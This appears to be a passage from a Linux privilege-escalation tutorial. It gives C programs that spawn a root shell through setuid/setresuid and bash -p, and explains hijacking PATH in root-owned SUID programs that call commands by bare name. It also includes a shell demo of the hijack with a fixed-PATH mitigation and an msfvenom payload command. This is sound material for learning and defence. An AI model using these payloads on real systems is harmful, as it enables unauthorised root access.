Note

It’s actually trivial to write a C program that loads up a shell.

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
 
int main(void) {
	/* Succeeds only if our effective UID is already 0, i.e. a root-owned
	   SUID program launched us; otherwise both calls fail with EPERM. */
	setuid(0);
	setgid(0);
	/* -p stops bash from resetting the effective UID to the real UID */
	execl("/bin/bash",
	      "/bin/bash",
	      "-p",
	      (char*) NULL);
	perror("execl");	/* only reached if the exec itself failed */
	return 1;
}

Alternate approach, via setresuid()/setresgid() and system():

#define _GNU_SOURCE	/* setresuid()/setresgid() are GNU extensions in glibc */
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
 
int main(void) {
	/* real, effective and saved IDs all to 0; setresgid() is the
	   three-argument call (setregid() only takes two) */
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	system("/bin/bash -p");
	return 0;
}

The system() variant runs the command through /bin/sh -c. If /bin/sh on the target is bash rather than dash and the setresuid() call failed (the SUID program is not root-owned), that intermediate shell drops the effective UID before /bin/bash ever sees -p. The execl() version has no intermediate shell and avoids this.

Compile with:

gcc -fPIC -o /path/to/malicious /path/to/malicious.c

Build it on the target, or against a compatible libc and architecture (add -static or -m32 as needed), so it actually runs there; -fPIC is unnecessary for an executable but harmless.

Note that this is almost identical to the LD_PRELOAD trick; the primary differences are:

  • Use main() instead of _init() as our entry point.
  • Compile without -shared and -nostartfiles, since this is a normal executable rather than a shared object.

A simple binary like this is useful for exploiting SUID/SGID applications that run other programs by bare name, e.g. system("ls") or execvp("ls", ...), because that name is resolved through PATH: drop the binary under that name in a directory we control, put the directory at the front of PATH, and run the SUID/SGID program. The malicious binary does not need the SUID bit itself; it inherits the caller's effective UID/GID. Two things decide whether this yields root: the SUID program must be owned by root (otherwise setuid(0) fails and bash -p merely keeps the owner's effective UID), and it must not reset PATH or use an absolute path before calling out.
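To watch the PATH lookup being hijacked without needing a root-owned SUID binary, here is an added example (not from the original page). It simulates the vulnerable program with sh -c 'ls', which is exactly what libc's system("ls") executes. The fake ls is a shell script rather than the compiled payload above, and the directory comes from mktemp; both are choices of this example. The second victim resets PATH to a fixed value before calling out, which is the usual fix.

```sh
#!/bin/sh
# Added example: PATH hijacking of a program launched by bare name.
# The victim is simulated with `sh -c 'ls'`, which is exactly what libc's
# system("ls") runs, so no SUID binary or root access is needed to watch
# the lookup go wrong. The fake `ls` is a script instead of the compiled
# payload, and the directory comes from mktemp (both are assumptions of
# this example, not the page's setup).

# Create a writable directory holding our fake `ls`; print its path.
make_hijack_dir() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/ls" <<'EOF'
#!/bin/sh
# Runs with whatever effective UID the caller had: 0 under a root SUID program.
echo "HIJACKED uid=$(id -u)"
EOF
    chmod 755 "$dir/ls"
    printf '%s\n' "$dir"
}

# Vulnerable victim: the bare name "ls" is resolved through PATH, and our
# directory ($1) has been put in front of it.
victim_bare_name() {
    PATH="$1:$PATH" sh -c 'ls'
}

# Hardened victim: PATH is reset to a fixed, trusted value before the call,
# so the attacker-controlled directory ($1) is never searched. Calling
# /bin/ls by absolute path would work just as well.
victim_fixed_path() {
    PATH="/usr/bin:/bin" sh -c 'ls -d /'
}

# Run both victims against the same hijack directory and report.
demo() {
    dir=$(make_hijack_dir) || return 1
    printf 'bare name  : %s\n' "$(victim_bare_name "$dir")"
    printf 'fixed PATH : %s\n' "$(victim_fixed_path "$dir")"
    rm -rf "$dir"
}

demo
```

Run it as an unprivileged user: the bare-name victim prints the HIJACKED marker with your own UID, while the fixed-PATH victim prints "/" from the real ls. Under a root-owned SUID program the same bare-name line would read uid=0, which is the situation the C payload above turns into a shell.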

Tip

Using Metasploit

Metasploit’s msfvenom tool can generate a small ELF that runs an arbitrary command, which serves the same purpose as the C binary above for SUID/SGID applications that run other programs by name through a PATH we control:

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \
         -o shell.elf

Use linux/x64/exec for a 64-bit target. The exec payload just execve()s /bin/sh -c with the command and makes no setuid() call, so the resulting shell keeps the SUID program's effective UID only because of -p; as with the system() variant above, if /bin/sh on the target is bash, that intermediate shell drops the effective UID first and the trick fails.

Tip